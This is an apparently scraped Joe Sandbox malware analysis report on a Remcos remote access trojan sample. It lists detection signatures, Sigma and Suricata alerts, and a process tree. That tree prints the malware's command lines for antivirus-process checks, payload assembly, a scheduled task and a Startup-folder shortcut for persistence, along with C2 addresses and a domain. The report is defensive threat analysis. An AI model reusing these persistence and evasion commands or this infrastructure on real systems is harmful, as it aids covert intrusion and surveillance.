Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nikDoCvpJa.exe

Overview

General Information

Sample name:nikDoCvpJa.exe
renamed because original name is a hash value
Original sample name:d2729f574a3ba69a10c00a5992986226.exe
Analysis ID:1578615
MD5:d2729f574a3ba69a10c00a5992986226
SHA1:827b50066bf4509c1f293f2e2170b86070f3bcd6
SHA256:2027658fe07e8ef66d192bf1697cf0d9e91f9813ded69da4408747fb3724b3ec
Tags:exeRATRemcosRATuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
AI detected suspicious sample
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Installs a global keyboard hook
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (surpress errors)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • nikDoCvpJa.exe (PID: 5252 cmdline: "C:\Users\user\Desktop\nikDoCvpJa.exe" MD5: D2729F574A3BA69A10C00A5992986226)
    • cmd.exe (PID: 5572 cmdline: "C:\Windows\System32\cmd.exe" /c copy Cab Cab.cmd & Cab.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 380 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 1096 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 1732 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 2748 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1516 cmdline: cmd /c md 638933 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 1576 cmdline: findstr /V "Chosen" Bugs MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 1784 cmdline: cmd /c copy /b ..\Wichita + ..\Sign + ..\Idol + ..\Lauren + ..\Rice + ..\Bold + ..\Loops + ..\Shore + ..\Marie g MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Beth.com (PID: 6976 cmdline: Beth.com g MD5: 62D09F076E6E0240548C2F837536A46A)
        • cmd.exe (PID: 7108 cmdline: cmd /c schtasks.exe /create /tn "Config" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 2300 cmdline: schtasks.exe /create /tn "Config" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
        • cmd.exe (PID: 7140 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberScope.url" & echo URL="C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberScope.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 7156 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 1436 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • CyberScope.com (PID: 5776 cmdline: "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com" "C:\Users\user\AppData\Local\SecureScope Dynamics\r" MD5: 62D09F076E6E0240548C2F837536A46A)
  • wscript.exe (PID: 4616 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • CyberScope.com (PID: 3788 cmdline: "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.com" "C:\Users\user\AppData\Local\SecureScope Dynamics\r" MD5: 62D09F076E6E0240548C2F837536A46A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\ProgramData\data\registros.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Config" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Config" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Config" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7108, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Config" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js'" /sc minute /mo 5 /F, ProcessId: 2300, ProcessName: schtasks.exe
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js", ProcessId: 1436, ProcessName: wscript.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Cab Cab.cmd & Cab.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Cab Cab.cmd & Cab.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\nikDoCvpJa.exe", ParentImage: C:\Users\user\Desktop\nikDoCvpJa.exe, ParentProcessId: 5252, ParentProcessName: nikDoCvpJa.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cab Cab.cmd & Cab.cmd, ProcessId: 5572, ProcessName: cmd.exe
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Config" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Config" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Config" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7108, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Config" /tr "wscript //B 'C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js'" /sc minute /mo 5 /F, ProcessId: 2300, ProcessName: schtasks.exe
    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js", ProcessId: 1436, ProcessName: wscript.exe

    Data Obfuscation

    barindex
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7140, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CyberScope.url

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Cab Cab.cmd & Cab.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5572, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 2748, ProcessName: findstr.exe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-19T23:42:58.468620+010020327761Malware Command and Control Activity Detected192.168.2.549804181.131.217.2443021TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-19T23:42:59.740248+010020327771Malware Command and Control Activity Detected181.131.217.2443021192.168.2.549804TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-19T23:43:01.524052+010028033043Unknown Traffic192.168.2.549810178.237.33.5080TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: nikDoCvpJa.exeReversingLabs: Detection: 26%
    Source: Yara matchFile source: C:\ProgramData\data\registros.dat, type: DROPPED
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.8% probability
    Source: nikDoCvpJa.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: nikDoCvpJa.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_0020A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_0020A087
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_0020A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,19_2_0020A1E2
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001FE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,19_2_001FE472
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_0020A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,19_2_0020A570
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001CC622 FindFirstFileExW,19_2_001CC622
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_002066DC FindFirstFileW,FindNextFileW,FindClose,19_2_002066DC
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_00207333 FindFirstFileW,FindClose,19_2_00207333
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_002073D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,19_2_002073D4
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001FD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_001FD921
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001FDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_001FDC54
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\638933Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\638933\Jump to behavior

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49804 -> 181.131.217.244:3021
    Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 181.131.217.244:3021 -> 192.168.2.5:49804
    Source: global trafficTCP traffic: 192.168.2.5:49804 -> 181.131.217.244:3021
    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
    Source: Joe Sandbox ViewIP Address: 181.131.217.244 181.131.217.244
    Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
    Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49810 -> 178.237.33.50:80
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_0020D889 InternetReadFile,SetEvent,GetLastError,SetEvent,19_2_0020D889
    Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
    Source: global trafficDNS traffic detected: DNS query: wnBHxhzUAWNxsjrpdZtUkwTu.wnBHxhzUAWNxsjrpdZtUkwTu
    Source: global trafficDNS traffic detected: DNS query: navegacionseguracol24vip.org
    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
    Source: Beth.com, 0000000B.00000003.2169068008.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, Beth.com, 0000000B.00000003.2604808028.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, Beth.com.2.dr, CyberScope.com.11.dr, Cleveland.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
    Source: nikDoCvpJa.exeString found in binary or memory: http://crl.globalsign.com/gs/gscodesignsha2g2.crl0
    Source: Beth.com, 0000000B.00000003.2169068008.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, Beth.com, 0000000B.00000003.2604808028.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, Beth.com.2.dr, CyberScope.com.11.dr, Cleveland.0.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
    Source: Beth.com, 0000000B.00000003.2169068008.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, Beth.com, 0000000B.00000003.2604808028.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, Beth.com.2.dr, CyberScope.com.11.dr, Cleveland.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
    Source: Beth.com, 0000000B.00000003.2169068008.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, Beth.com, 0000000B.00000003.2604808028.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, Beth.com.2.dr, CyberScope.com.11.dr, Cleveland.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
    Source: Beth.com, 0000000B.00000003.2169068008.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, Beth.com, 0000000B.00000003.2604808028.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, Beth.com.2.dr, CyberScope.com.11.dr, Cleveland.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
    Source: nikDoCvpJa.exeString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
    Source: nikDoCvpJa.exeString found in binary or memory: http://crl.globalsign.net/root-r3.crl0G
    Source: nikDoCvpJa.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
    Source: nikDoCvpJa.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: Beth.com, 0000000B.00000003.2169068008.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, Beth.com, 0000000B.00000003.2604808028.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, Beth.com.2.dr, CyberScope.com.11.dr, Cleveland.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
    Source: nikDoCvpJa.exeString found in binary or memory: http://ocsp.thawte.com0
    Source: nikDoCvpJa.exeString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g20
    Source: Beth.com, 0000000B.00000003.2169068008.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, Beth.com, 0000000B.00000003.2604808028.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, Beth.com.2.dr, CyberScope.com.11.dr, Cleveland.0.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
    Source: Beth.com, 0000000B.00000003.2169068008.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, Beth.com, 0000000B.00000003.2604808028.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, nikDoCvpJa.exe, Beth.com.2.dr, CyberScope.com.11.dr, Cleveland.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
    Source: Beth.com, 0000000B.00000003.2169068008.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, Beth.com, 0000000B.00000003.2604808028.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, Beth.com.2.dr, CyberScope.com.11.dr, Cleveland.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
    Source: nikDoCvpJa.exeString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g2.crt08
    Source: Beth.com, 0000000B.00000003.2169068008.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, Beth.com, 0000000B.00000003.2604808028.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, Beth.com.2.dr, CyberScope.com.11.dr, Cleveland.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
    Source: Beth.com, 0000000B.00000003.2169068008.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, Beth.com, 0000000B.00000003.2604808028.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, Beth.com.2.dr, CyberScope.com.11.dr, Cleveland.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
    Source: nikDoCvpJa.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
    Source: nikDoCvpJa.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
    Source: nikDoCvpJa.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
    Source: Beth.com, 0000000B.00000003.2169068008.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, Beth.com, 0000000B.00000000.2162090639.0000000000895000.00000002.00000001.01000000.00000007.sdmp, CyberScope.com, 00000013.00000002.2190131677.0000000000265000.00000002.00000001.01000000.00000009.sdmp, CyberScope.com, 00000016.00000000.2276662268.0000000000265000.00000002.00000001.01000000.00000009.sdmp, Beth.com.2.dr, CyberScope.com.11.dr, Cleveland.0.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
    Source: Beth.com, 0000000B.00000003.2169068008.00000000040D3000.00000004.00000800.00020000.00000000.sdmp, Beth.com, 0000000B.00000003.2604808028.00000000033A2000.00000004.00000020.00020000.00000000.sdmp, Beth.com.2.dr, CyberScope.com.11.dr, Cleveland.0.drString found in binary or memory: https://www.autoitscript.com/autoit3/
    Source: Cleveland.0.drString found in binary or memory: https://www.globalsign.com/repository/0
    Source: nikDoCvpJa.exeString found in binary or memory: https://www.globalsign.com/repository/06

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Local\Temp\638933\Beth.comJump to behavior
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeCode function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_0020F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,19_2_0020F7C7
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_0020F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,19_2_0020F55C
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_00229FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,19_2_00229FD2

    E-Banking Fraud

    barindex
    Source: Yara matchFile source: C:\ProgramData\data\registros.dat, type: DROPPED

    System Summary

    barindex
    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.js"
    Source: C:\Users\user\AppData\Local\Temp\638933\Beth.comProcess Stats: CPU usage > 49%
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_00204763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,19_2_00204763
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001F1B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,19_2_001F1B4D
    Source: C:\Users\user\Desktop\nikDoCvpJa.exeCode function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
    Source: C:\Users\user\AppData\Local\SecureScope Dynamics\CyberScope.comCode function: 19_2_001FF20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,19_2_001FF20D
